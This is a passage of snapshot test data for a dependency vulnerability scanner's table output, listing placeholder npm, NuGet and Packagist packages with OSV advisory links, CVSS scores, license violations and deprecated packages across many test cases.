ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | 7.8 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. +---------------------------------------------------------+ | Deprecated packages | +-----------+----------------+---------+------------------+ | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-----------+----------------+---------+------------------+ | npm | deprecated-pkg | 1.0.0 | path/to/lockfile | +-----------+----------------+---------+------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+----------------------------+ | MIT | npm | mine2 | 5.9.0 | path/to/my/second/lockfile | +-------------------+-----------+---------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 (dev) | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | 4.3 | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | 9 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+-------------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+-------------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+-------------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/GHSA-123 | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | 8.3 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/GHSA-123 | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/GHSA-123 | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+-----------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+-----------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine3 | 0.10.2-rc | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+-----------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/second/lockfile | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_StandardTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 